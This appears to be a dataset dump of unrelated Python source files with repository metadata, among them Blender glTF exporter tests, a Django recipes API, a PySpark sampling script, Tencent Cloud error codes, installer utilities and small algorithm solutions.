if(os.getcwd() != code_exe_dir): ### if we are not in step10_b.py's folder, switch over automatically~
    os.chdir(code_exe_dir)
# print("current_path:", os.getcwd())
###############################################################################################################################################################################################################
### All experiment commands are collected here in one place
from step10_c_exp_command import *
######################################################################################################################
import subprocess as sb
### I_w_M_to_C 3UNet/wiDiv/woDiv %& FL/FM/NL/NM
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L5__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L5__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L6__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L6__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L7__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L7__woD_L__Full_Less_in_have_bg .{train}"])
### W_w_M_to_C woDiv
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L5__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L5__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L6__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L6__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L7__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L7__woD_L__Full_Less_in_have_bg .{train}"])
##### Train jointly
### 4. woD_L woD_L (remember: for woD_L, `seperate` must be set to False); test this one second
# This run did unexpectedly well; I want to see how good it can get
# sb.run(cmd_python_step10_a + [f"exp_L5_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L5_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L6_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L6_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L7_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L7_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"])
| [
"s89334roy@yahoo.com.tw"
] | s89334roy@yahoo.com.tw |
6337e2499c6fa0da29ea130222d938fa6a36f58a | 528f910908885c3ded4ecc6380b9603c8dcacbd6 | /tbapi/top/api/rest/SimbaRptCustbaseGetRequest.py | c9d9394a3214923195d5a87283bd2c0146389272 | [] | no_license | Monica-ckd/data007 | 15fe9c4c898a51a58100138b6b064211199d2ed1 | 0e54ae57eb719b86ec14ce9f77b027882a3398a8 | refs/heads/master | 2023-03-16T05:26:14.257318 | 2016-05-25T06:57:05 | 2016-05-25T06:57:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 464 | py | '''
Created by auto_sdk on 2013-04-01 16:44:41
'''
from top.api.base import RestApi
class SimbaRptCustbaseGetRequest(RestApi):
    """Request object for the ``taobao.simba.rpt.custbase.get`` TOP API."""

    def __init__(self, domain='gw.api.taobao.com', port=80):
        RestApi.__init__(self, domain, port)
        # Request parameters; each stays None until set by the caller.
        self.end_time = None
        self.nick = None
        self.page_no = None
        self.page_size = None
        self.source = None
        self.start_time = None
        self.subway_token = None

    def getapiname(self):
        """Name of the TOP API method this request maps to."""
        return 'taobao.simba.rpt.custbase.get'
| [
"root@u16392468.onlinehome-server.com"
] | root@u16392468.onlinehome-server.com |
a66ad8b37efa20112165adcc07b03e6251140a84 | 7a5576a22774c8e36830781a845c0ac39243af99 | /tests/unit/test_image.py | e26427a2f2abfd00f2f1968405b9a41875cc1403 | [
"Apache-2.0"
] | permissive | Kupoman/blendergltf | 1ccece9793005c57683baf6cfd50cadb7ff303c0 | cd665283e5fce6447abba22dfd9f584c602a1782 | refs/heads/develop | 2022-07-04T06:04:04.535191 | 2019-06-16T01:32:40 | 2019-06-16T02:21:09 | 51,494,812 | 353 | 60 | Apache-2.0 | 2020-05-30T14:29:18 | 2016-02-11T04:53:55 | Python | UTF-8 | Python | false | false | 2,570 | py | def test_image_export_reference(exporters, state, bpy_image_default, gltf_image_default):
state['settings']['images_data_storage'] = 'REFERENCE'
gltf_image_default['uri'] = '../filepath.png'
output = exporters.ImageExporter.export(state, bpy_image_default)
assert output == gltf_image_default
def test_image_export_embed(exporters, state, bpy_image_default, gltf_image_default):
    """EMBED storage mode should inline the PNG bytes as a base64 data URI."""
    state['settings']['images_data_storage'] = 'EMBED'
    gltf_image_default['uri'] = (
        'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACElEQVR42gMAAAAAAW'
        '/dyZEAAAAASUVORK5CYII='
    )
    gltf_image_default['mimeType'] = 'image/png'
    output = exporters.ImageExporter.export(state, bpy_image_default)
    assert output == gltf_image_default
def test_image_export_embed_glb(exporters, state, bpy_image_default, gltf_image_default):
    """Binary (.glb) export should embed the image via a buffer view, not a URI."""
    state['settings']['images_data_storage'] = 'EMBED'
    state['settings']['gltf_export_binary'] = True
    gltf_image_default['mimeType'] = 'image/png'
    gltf_image_default['bufferView'] = 'bufferView_buffer_Image_0'
    output = exporters.ImageExporter.export(state, bpy_image_default)
    # Resolve the exporter's pending cross-references so the comparison sees
    # final (blender) names rather than reference placeholders.
    for ref in state['references']:
        ref.source[ref.prop] = ref.blender_name
    assert output == gltf_image_default
def test_image_to_data_uri(exporters, bpy_image_default):
    """image_to_data_uri should yield the raw PNG byte stream for a 1x1 image."""
    # Expected bytes: a minimal 1x1 PNG (signature, IHDR, IDAT, IEND chunks).
    image_data = (
        b'\x89PNG\r\n\x1a\n\x00\x00\x00\r'
        b'IHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\x08'
        b'IDATx\xda\x03\x00\x00\x00\x00\x01o\xdd\xc9\x91\x00\x00\x00\x00'
        b'IEND\xaeB`\x82'
    )
    assert exporters.ImageExporter.image_to_data_uri(bpy_image_default) == image_data
def test_image_check(exporters, state, bpy_image_default):
    """A default image must pass the exporter's sanity check."""
    assert exporters.ImageExporter.check(state, bpy_image_default)
def test_image_default(exporters, state, bpy_image_default):
    """default() should produce a minimal placeholder image description."""
    assert exporters.ImageExporter.default(state, bpy_image_default) == {
        'name': 'Image',
        'uri': '',
    }
def test_image_check_0_x(exporters, state, bpy_image_default):
    """Images with zero width must fail the sanity check."""
    bpy_image_default.size = [0, 1]
    assert exporters.ImageExporter.check(state, bpy_image_default) is not True
def test_image_check_0_y(exporters, state, bpy_image_default):
    """Images with zero height must fail the sanity check."""
    bpy_image_default.size = [1, 0]
    assert exporters.ImageExporter.check(state, bpy_image_default) is not True
def test_image_check_type(exporters, state, bpy_image_default):
    """Non-IMAGE datablock types must fail the sanity check."""
    bpy_image_default.type = 'NOT_IMAGE'
    assert exporters.ImageExporter.check(state, bpy_image_default) is not True
| [
"kupomail@gmail.com"
] | kupomail@gmail.com |
79609da4ebb7b41e9546575df82cac770fc8e609 | 3c541cf9d6956f580eb6fec039e567d0813ee272 | /apps/recipes/views/recipes.py | 8ea96fb3baf2507cfcc458eceef1f76889e0aaa4 | [] | no_license | NicolasTerroni/MyFridgeAPI | 9c4a7b28f48d9c547b82bc45348a4a2bd58d8551 | 5cd1b3155c4542d0479948f39701b539497e28f7 | refs/heads/main | 2023-07-01T03:05:09.422293 | 2021-08-10T04:10:44 | 2021-08-10T04:10:44 | 382,104,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,893 | py | """Recipes views."""
# Django REST Framework
from rest_framework.viewsets import ModelViewSet
from rest_framework.decorators import action
from rest_framework.response import Response
# Serializers
from apps.recipes.serializers import RecipeModelSerializer, CreateRecipeSerializer
# Models
from apps.recipes.models import Recipe
# Permissions
from rest_framework.permissions import IsAuthenticated
from apps.recipes.permissions import IsRecipeOwner
# Utilities
from collections import Counter
class RecipesViewSet(ModelViewSet):
    """Recipes viewset.

    CRUD for Recipe objects (looked up by slug) plus two read-only list
    actions: recipes matching the user's fridge contents, and the user's
    own recipes.
    """
    queryset = Recipe.objects.all()
    lookup_field = 'slug_name'
    def get_permissions(self):
        """Assign permissions based on action.

        Everyone must be authenticated; mutating an existing recipe
        additionally requires ownership.
        """
        permissions = [IsAuthenticated,]
        if self.action in ['update','partial_update','destroy']:
            permissions.append(IsRecipeOwner)
        return [permission() for permission in permissions]
    def get_serializer_class(self):
        """Return serializer class based on action."""
        if self.action == "create":
            return CreateRecipeSerializer
        else:
            return RecipeModelSerializer
    @action(detail=False)
    def possible_recipes(self, request):
        """Returns recipes that contain at least one of the ingredients from the user's fridge."""
        # Get user fridge's ingredients
        fridge_ingredients_queryset = request.user.fridge.ingredients.all()
        # Transform the queryset into a list
        fridge_ingredients = [i for i in fridge_ingredients_queryset]
        # Get recipes that contain at least one of the ingredients from the user's fridge.
        # The __in filter yields one row (duplicate Recipe instance) per
        # matching ingredient.
        queryset = Recipe.objects.filter(ingredients__in=fridge_ingredients)
        # Counter counts those duplicates; sorting its keys by count gives a
        # de-duplicated list ordered by how many fridge ingredients matched.
        counts = Counter(queryset)
        queryset = sorted(counts, key=counts.get, reverse=True)
        # Pagination (manual, since this is a custom list action)
        page = self.paginate_queryset(queryset)
        if page is not None:
            serializer = self.get_serializer(page, many=True)
            return self.get_paginated_response(serializer.data)
        serializer = self.get_serializer(queryset, many=True)
        return Response(serializer.data)
    @action(detail=False)
    def my_recipes(self, request):
        """List the requesting user recipes."""
        queryset = Recipe.objects.filter(created_by=request.user)
        # Pagination
        page = self.paginate_queryset(queryset)
        if page is not None:
            serializer = self.get_serializer(page, many=True)
            return self.get_paginated_response(serializer.data)
        serializer = self.get_serializer(queryset, many=True)
        return Response(serializer.data)
"nsterroni@gmail.com"
] | nsterroni@gmail.com |
be134015a3d29b2e9234fc1baf05fbb8b076fb41 | fcd2ece104f3c5ade822fd8b6ae35e3dd48e35b1 | /code/2-twitter_labor/1-training_data_preparation/preliminary/ngram_labeling/build_set_specificity_check.py | 54d4e9a89780968a89e234a79ce889fe5ec87f76 | [] | no_license | spfraib/twitter | 975742c9090b628ade0ec7230d0a9f09ab6e5d4a | da2104d30d094d5f943a057f5c1df902c2254d4d | refs/heads/master | 2023-06-22T08:37:22.523478 | 2022-12-30T17:49:33 | 2022-12-30T17:49:33 | 236,588,781 | 6 | 4 | null | 2023-06-12T21:28:41 | 2020-01-27T20:34:53 | Jupyter Notebook | UTF-8 | Python | false | false | 1,488 | py | from pyspark.sql import SparkSession
import pyspark.sql.functions as F
from pyspark.ml.feature import Bucketizer, QuantileDiscretizer
from pyspark.sql import Window
from pyspark.sql.types import *
from pyspark.sql.functions import lower, col, lit
import subprocess
import argparse
import os
import unicodedata
import sys
from pyspark.sql.functions import translate, regexp_replace
from pyspark.sql.types import StringType
from pyspark.sql.functions import udf
# Reuse an already-defined SparkSession (e.g. when pasted into an interactive
# pyspark shell where `spark` exists); otherwise create a fresh one.
try:
    spark
except NameError:
    spark = SparkSession.builder.appName("").getOrCreate()
if __name__ == "__main__":
    # Combine the two labelled ngram samples into one dataframe.
    df_sample_1000 = spark.read.parquet('/user/mt4493/twitter/ngram_samples/US/sample_1000')
    df_sample_new_1000 = spark.read.parquet('/user/mt4493/twitter/ngram_samples/US/sample_new_1000')
    df = df_sample_1000.union(df_sample_new_1000)
    # Replace literal backslashes in the tweet text with spaces.
    # BUGFIX: the pattern argument is a Java regex, so a lone backslash
    # ('\\' in Python source) is an invalid pattern and raises a
    # PatternSyntaxException at execution time; a regex-escaped backslash
    # ('\\\\' in Python source) is required.
    df = df.withColumn('text', regexp_replace('text', '\\\\', ' '))
    # Drop ngrams that were judged unusable for labelling.
    dropped_ngrams_list = ['i_fired', 'firedme', 'i_unemployed', 'i_jobless', 'i_not_working']
    df = df.filter(~df.ngram.isin(dropped_ngrams_list))
    # Per-ngram sampling fraction: keep everything for rare ngrams (<20 tweets),
    # otherwise sample down to roughly 20 tweets per ngram.
    f = df.groupby('ngram').count()
    f = f.withColumn('frac', F.when(col('count') < 20, 1).otherwise(20 / col('count')))
    frac_dict = dict(f.select('ngram', 'frac').collect())
    df_sampled = df.sampleBy('ngram', fractions=frac_dict)
    df_sampled = df_sampled.select('tweet_id', 'text', 'ngram')
    # Single CSV with header, for the manual specificity check.
    df_sampled.coalesce(1).write.mode("overwrite").option("header", "true").csv('/user/mt4493/twitter/ngram_samples/US/specificity_check')
| [
"manuel.tonneau@mailbox.org"
] | manuel.tonneau@mailbox.org |
ddbef986dae907d2050b594e370f2184388f1920 | e7c70a02e61f6d4a97c5933f3550bca22afa6acb | /ros_ws/build/learning_ros/Part_1/custom_msgs/cmake/custom_msgs-genmsg-context.py | cdf5cb754534d19022baa9bb108ca94f21ca075e | [] | no_license | amitf82/Final_Proj_Mobile_Robotics | 14cfe7b182df1294a873283c91688c8ca9526fee | 435a6c1562df030fc462fe1b0a84f968a27a2b85 | refs/heads/master | 2021-01-20T03:22:51.387095 | 2017-04-30T08:25:33 | 2017-04-30T08:25:33 | 89,532,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | # generated from genmsg/cmake/pkg-genmsg.context.in
# Values substituted by CMake/genmsg at configure time — do not edit by hand;
# regenerate by rebuilding the catkin workspace.
messages_str = "/home/user/ros_ws/src/learning_ros/Part_1/custom_msgs/msg/VecOfDoubles.msg"
services_str = ""
pkg_name = "custom_msgs"
dependencies_str = "roscpp;std_msgs"
langs = "gencpp;genlisp;genpy"
dep_include_paths_str = "custom_msgs;/home/user/ros_ws/src/learning_ros/Part_1/custom_msgs/msg;roscpp;/opt/ros/indigo/share/roscpp/cmake/../msg;std_msgs;/opt/ros/indigo/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python"
# CMake substituted an empty string for the flag, so this evaluates to False.
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/indigo/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| [
"adf38@case.edu"
] | adf38@case.edu |
f69ccb7f33652833c315b76a7a2d83e1524f1e29 | 4dfd539c530c5cff6874f2fa0c06ffd893212ad3 | /tencentcloud/yunjing/v20180228/errorcodes.py | c9d51af5bf9ec25e5d48a99b9a144f01510b9ba7 | [] | no_license | TencentCloud/tencentcloud-sdk-python-intl-en | aac605d1a0458b637ba29eb49f6f166fe844a269 | 042b4d7fb609d4d240728197901b46008b35d4b0 | refs/heads/master | 2023-09-01T19:39:27.436454 | 2023-09-01T04:02:15 | 2023-09-01T04:02:15 | 227,834,644 | 4 | 6 | null | 2023-07-17T08:56:56 | 2019-12-13T12:23:52 | Python | UTF-8 | Python | false | false | 3,195 | py | # -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Error-code constants for the Yunjing (Cloud Workload Protection) API,
# version 2018-02-28.  Each constant maps to the dotted error-code string
# returned by the API.
# The agent is offline.
FAILEDOPERATION_AGENTOFFLINE = 'FailedOperation.AgentOffline'
# Failed to deactivate CWP Pro.
FAILEDOPERATION_CLOSEPROVERSION = 'FailedOperation.CloseProVersion'
# Failed to create a port acquisition task.
FAILEDOPERATION_CREATEOPENPORTTASK = 'FailedOperation.CreateOpenPortTask'
# Failed to create a real-time process acquisition task.
FAILEDOPERATION_CREATEPROCESSTASK = 'FailedOperation.CreateProcessTask'
# Failed to export.
FAILEDOPERATION_EXPORT = 'FailedOperation.Export'
# The server was uninstalled.
FAILEDOPERATION_MACHINEDELETE = 'FailedOperation.MachineDelete'
# The real-time port pulling task does not exist.
FAILEDOPERATION_OPENPORTTASKNOTFOUND = 'FailedOperation.OpenPortTaskNotFound'
# Failed to activate CWP Pro.
FAILEDOPERATION_OPENPROVERSION = 'FailedOperation.OpenProVersion'
# Failed to isolate all or part of servers.
FAILEDOPERATION_PARTSEPARATE = 'FailedOperation.PartSeparate'
# Unable to disable the prepaid Pro edition. Please disable it in Billing Center.
FAILEDOPERATION_PREPAYMODE = 'FailedOperation.PrePayMode'
# The real-time process pulling task does not exist.
FAILEDOPERATION_PROCESSTASKNOTFOUND = 'FailedOperation.ProcessTaskNotFound'
# Failed to recover the trojan.
FAILEDOPERATION_RECOVER = 'FailedOperation.Recover'
# Failed to scan for vulnerabilities again.
FAILEDOPERATION_RESCANVUL = 'FailedOperation.RescanVul'
# The server already has a rescan task in progress.
FAILEDOPERATION_RESCANVULPROCESSINUSE = 'FailedOperation.RescanVulProcessInUse'
# Failed to isolate a single server.
FAILEDOPERATION_SINGLESEPARATE = 'FailedOperation.SingleSeparate'
# Internal error.
INTERNALERROR = 'InternalError'
# The time range format is incorrect.
INVALIDPARAMETER_DATERANGE = 'InvalidParameter.DateRange'
# Invalid request.
INVALIDPARAMETER_ILLEGALREQUEST = 'InvalidParameter.IllegalRequest'
# Incorrect parameter format.
INVALIDPARAMETER_INVALIDFORMAT = 'InvalidParameter.InvalidFormat'
# Missing parameter.
INVALIDPARAMETER_MISSINGPARAMETER = 'InvalidParameter.MissingParameter'
# Parameter parsing error.
INVALIDPARAMETER_PARSINGERROR = 'InvalidParameter.ParsingError'
# The tag name cannot contain more than 15 characters.
INVALIDPARAMETERVALUE_TAGNAMELENGTHLIMIT = 'InvalidParameterValue.TagNameLengthLimit'
# The maximum number of entries to be added in batches is exceeded.
LIMITEXCEEDED_AREAQUOTA = 'LimitExceeded.AreaQuota'
# Missing parameter.
MISSINGPARAMETER = 'MissingParameter'
# The resource does not exist.
RESOURCENOTFOUND = 'ResourceNotFound'
| [
"tencentcloudapi@tenent.com"
] | tencentcloudapi@tenent.com |
f3a6c973676ba8b267b8fa1e5199895b9be7deb1 | ba0cbdae81c171bd4be7b12c0594de72bd6d625a | /MyToontown/Panda3D-1.9.0/direct/pyinst/installutils.py | 66eca013464126d08d7eeba3bad65df0cecb3bb2 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | sweep41/Toontown-2016 | 65985f198fa32a832e762fa9c59e59606d6a40a3 | 7732fb2c27001264e6dd652c057b3dc41f9c8a7d | refs/heads/master | 2021-01-23T16:04:45.264205 | 2017-06-04T02:47:34 | 2017-06-04T02:47:34 | 93,279,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,790 | py | # copyright 1999 McMillan Enterprises, Inc.
# demo code - use as you please.
import os
import stat
import sys  # needed by getinstalldir() for sys.exit()
def copyFile(srcFiles, destFile, append=0):
    '''
    Copy one or more files to another file. If srcFiles is a list, then all
    will be concatenated together to destFile. The append flag is also valid
    for single file copies.
    destFile will have the mode, ownership and timestamp of the last file
    copied/appended.
    '''
    if type(srcFiles) == type([]):
        # List case: recurse per file.
        # in case we need to overwrite on the first file...
        copyFile(srcFiles[0], destFile, append)
        for file in srcFiles[1:]:
            copyFile(file, destFile, 1)
        return
    mode = 'wb'
    if append:
        mode = 'ab'
    print " ", srcFiles, "->",
    input = open(srcFiles, 'rb')
    if input:
        print destFile
        output = open(destFile, mode)
        # Stream in 8 KiB chunks to keep memory bounded for large files.
        while 1:
            bytesRead = input.read(8192)
            if bytesRead:
                output.write(bytesRead)
            else:
                break
        input.close()
        output.close()
    # Mirror the source file's mode, timestamps and ownership onto the copy.
    stats = os.stat(srcFiles)
    os.chmod(destFile, stats[stat.ST_MODE])
    try: # FAT16 file systems have only one file time
        os.utime(destFile, (stats[stat.ST_ATIME], stats[stat.ST_MTIME]))
    except:
        pass
    try:
        # chown is unavailable / restricted on some platforms; best effort only.
        os.chown(destFile, stats[stat.ST_UID], stats[stat.ST_GID])
    except:
        pass
def ensure(dirct):
    """Create directory *dirct* and any missing parents.

    Returns 1 on success (including when the directory already exists),
    0 if any step fails.
    """
    missing = []
    path = dirct
    try:
        # Climb toward the root, remembering each component that does not
        # exist yet, until we reach an existing ancestor (or run out of path).
        while not os.path.exists(path):
            path, leaf = os.path.split(path)
            if not leaf:
                break
            missing.append(leaf)
        # Recreate the missing components top-down.
        for leaf in reversed(missing):
            path = os.path.join(path, leaf)
            os.mkdir(path)
    except:
        # Preserve the original contract: any failure is reported as 0.
        return 0
    return 1
def getinstalldir(prompt="Enter an installation directory: "):
while 1:
installdir = raw_input("Enter an installation directory: ")
installdir = os.path.normpath(installdir)
if ensure(installdir):
break
else:
print installdir, "is not a valid pathname"
r = raw_input("Try again (y/n)?: ")
if r in 'nN':
sys.exit(0)
return installdir
def installCArchive(nm, basedir, suffixdir):
    # Extract every member of the CArchive file *nm* into basedir/suffixdir,
    # then delete the archive itself.  Members whose target directory cannot
    # be created are silently skipped.
    import carchive_rt
    fulldir = os.path.join(basedir, suffixdir)
    if ensure(fulldir):
        pkg = carchive_rt.CArchive(nm)
        for fnm in pkg.contents():
            # extract() returns (ispkg, data); only the raw bytes are needed.
            stuff = pkg.extract(fnm)[1]
            outnm = os.path.join(fulldir, fnm)
            if ensure(os.path.dirname(outnm)):
                open(outnm, 'wb').write(stuff)
        # Drop the reference so the archive file can be removed.
        pkg = None
        os.remove(nm)
| [
"sweep14@gmail.com"
] | sweep14@gmail.com |
8c3aaaf2d9408dc92686db92188f28478d2d1435 | 33a32d7d7b482206852a7bbeb7fa507f55ca53dd | /models/category.py | 3f0f824e93bb71a744c8707273430117db463718 | [] | no_license | stanislawK/bookshelf | 94277b0103b522302782c3a5fed9e4c790d6f86f | fa68dda7f88c83080ad9a51a1ed16994b2bca054 | refs/heads/master | 2020-05-21T18:44:14.396967 | 2019-05-20T10:04:06 | 2019-05-20T10:04:06 | 186,138,290 | 0 | 0 | null | 2019-05-20T08:11:44 | 2019-05-11T13:47:42 | Python | UTF-8 | Python | false | false | 494 | py | from bookshelf.extensions import db
class CategoryModel(db.Model):
    """SQLAlchemy model for a book category."""

    __tablename__ = 'categories'

    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(50), nullable=False)

    @classmethod
    def find_by_name(cls, _name):
        """Return the first category called *_name*, or None."""
        return cls.query.filter(cls.name == _name).first()

    @classmethod
    def find_by_id(cls, _id):
        """Return the category with primary key *_id*, or None."""
        return cls.query.filter(cls.id == _id).first()

    def save_to_db(self):
        """Add this category to the session and commit."""
        db.session.add(self)
        db.session.commit()
| [
"stanislaw.krupienko@gmail.com"
] | stanislaw.krupienko@gmail.com |
4f0372e774eb8b7d1ce6d898124f7ccc4c782e29 | d41d18d3ea6edd2ec478b500386375a8693f1392 | /plotly/validators/contourcarpet/colorbar/tickfont/_family.py | 15aef26e53e16075df0e8f184ac20f62ac43a276 | [
"MIT"
] | permissive | miladrux/plotly.py | 38921dd6618650d03be9891d6078e771ffccc99a | dbb79e43e2cc6c5762251537d24bad1dab930fff | refs/heads/master | 2020-03-27T01:46:57.497871 | 2018-08-20T22:37:38 | 2018-08-20T22:37:38 | 145,742,203 | 1 | 0 | MIT | 2018-08-22T17:37:07 | 2018-08-22T17:37:07 | null | UTF-8 | Python | false | false | 514 | py | import _plotly_utils.basevalidators
class FamilyValidator(_plotly_utils.basevalidators.StringValidator):
    """String validator for the ``family`` font property of
    ``contourcarpet.colorbar.tickfont``."""

    def __init__(self, plotly_name='family',
                 parent_name='contourcarpet.colorbar.tickfont', **kwargs):
        # Fixed options for this property: non-blank, strict string, styled
        # edits applied through the 'colorbars' edit type.
        super(FamilyValidator, self).__init__(
            plotly_name=plotly_name, parent_name=parent_name,
            edit_type='colorbars', no_blank=True,
            role='style', strict=True, **kwargs)
| [
"adam.kulidjian@gmail.com"
] | adam.kulidjian@gmail.com |
6988d0bf81d29b125be98f70f357cda2d3f89cd1 | 6ab810f6ca51dc2e2d0b7197fc1866b738ca70a2 | /Contest/WC213/5555.统计字典序元音字符串的数目.py | eb45f72780ddd673963c0da027b281fa4e3be4db | [
"MIT"
] | permissive | ApocalypseMac/LeetCode | 2309223be0c3e2969850cf1770eef2a447d39317 | 84c229eaf5a2e617ca00cabed04dd76d508d60b8 | refs/heads/master | 2023-04-14T19:22:34.340333 | 2021-03-28T05:20:40 | 2021-03-28T05:20:40 | 282,896,723 | 1 | 2 | MIT | 2020-07-29T05:05:19 | 2020-07-27T12:49:40 | Python | UTF-8 | Python | false | false | 310 | py | class Solution:
def countVowelStrings(self, n: int) -> int:
dp = [[0] * 5 for _ in range(n + 1)]
for i in range(n + 1):
dp[i][0] = 1
for i in range(1, n + 1):
for j in range(1, 5):
dp[i][j] = dp[i-1][j] + dp[i][j-1]
return sum(dp[-1]) | [
"ApocalypseMac@users.noreply.github.com"
] | ApocalypseMac@users.noreply.github.com |
5a2519e963859ae158490a2f5abc861b2d5ddaed | 9805edf2b923c74cf72a3cfb4c2c712255256f15 | /python/041_first_missing_positive.py | 00bc37e88ed085cdb52e6a5065ea4211b936dbd3 | [
"MIT"
] | permissive | jixinfeng/leetcode-soln | 5b28e49c2879cdff41c608fc03628498939b0e99 | 24cf8d5f1831e838ea99f50ce4d8f048bd46c136 | refs/heads/master | 2022-10-12T17:02:53.329565 | 2022-10-06T03:21:56 | 2022-10-06T03:21:56 | 69,371,757 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,004 | py | """
Given an unsorted integer array, find the first missing positive integer.
For example,
Given [1,2,0] return 3,
and [3,4,-1,1] return 2.
Your algorithm should run in O(n) time and uses constant space.
"""
class Solution(object):
def firstMissingPositive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if nums is None or nums == []:
return 1
i = 0
n = len(nums)
while i < n:
if nums[i] > 0 and nums[i] < n and nums[i] != nums[nums[i] - 1]:
nums[nums[i] - 1], nums[i] = nums[i], nums[nums[i] - 1]
else:
i += 1
for i in range(n):
if nums[i] != i + 1:
return i + 1
return n + 1
a = Solution()
assert a.firstMissingPositive([1,2,0]) == 3
assert a.firstMissingPositive([3,4,-1,1]) == 2
assert a.firstMissingPositive([2]) == 1
assert a.firstMissingPositive([1,1]) == 2
assert a.firstMissingPositive([1000,-1]) == 1
| [
"ufjfeng@users.noreply.github.com"
] | ufjfeng@users.noreply.github.com |
61b010f0c53d635bc3d60ea40135546e539a1c46 | 60e4baae4d6b323b3d3b656df3a7b0ea3ca40ef2 | /project/apps/content/migrations/0011_auto_20180112_0303.py | 45634aba944d38cfd3ac6dae8c65c055ac45551b | [] | no_license | Burzhun/Big-django-project | a03a61a15ee75f49324ad7ea51372b6b013d1650 | 1a71f974b7b5399a45862711b5f858c0d4af50d2 | refs/heads/master | 2020-04-11T00:16:06.211039 | 2018-12-11T19:13:38 | 2018-12-11T19:13:38 | 161,381,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-12 03:03
from __future__ import unicode_literals
from django.utils import timezone
from django.db import migrations
from itertools import chain
import json
def migrate_published_dates(apps, schema_editor):
article_pages = apps.get_model('content', 'ArticlePage').objects.all()
news_pages = apps.get_model('content', 'NewsPage').objects.all()
blog_pages = apps.get_model('content', 'BlogPage').objects.all()
for page in chain(article_pages, news_pages, blog_pages):
page.published_at = page.go_live_at
page.go_live_at = None
page.save()
revision = page.revisions.order_by('-created_at', '-id').first()
if not revision:
continue
content_json = json.loads(revision.content_json)
content_json["published_at"] = str(page.published_at)
try:
del content_json["go_live_at"]
except:
pass
revision.content_json = json.dumps(content_json)
revision.save()
class Migration(migrations.Migration):
dependencies = [
('content', '0010_auto_20180112_0254'),
]
operations = [
migrations.RunPython(migrate_published_dates),
]
| [
"burjunov@yandex.ru"
] | burjunov@yandex.ru |
c09e01caaebea0f93a9e3aa35d47a7ed3b477620 | d96787f92bd86c8d8bcf01a4e7ec8f7feec24194 | /kattis/acm/solution.py | 26e0a74268c2f86a516dd1d097fcb4055afcc15e | [] | no_license | iandioch/solutions | 133cbc3af58fadcde0b2e981fb0e7d05801070a7 | 8b3e458b3c01179ddf776bfbb897f263f22f3693 | refs/heads/master | 2023-04-09T03:39:16.952817 | 2023-03-15T20:00:53 | 2023-03-15T20:00:53 | 47,693,495 | 48 | 40 | null | 2019-10-22T14:52:59 | 2015-12-09T13:36:55 | Python | UTF-8 | Python | false | false | 477 | py | solved = {} # map question to time solved
tries_before_solving = {}
while True:
p = input().split()
if len(p) == 1:
break
time = int(p[0])
q = p[1]
if q in solved:
continue
if q in tries_before_solving:
tries_before_solving[q] += 1
else:
tries_before_solving[q] = 1
if p[2] == 'right':
solved[q] = time
print(len(solved), end=' ')
print(sum([solved[x] + 20*(tries_before_solving[x]-1) for x in solved]))
| [
"iandioch11@gmail.com"
] | iandioch11@gmail.com |
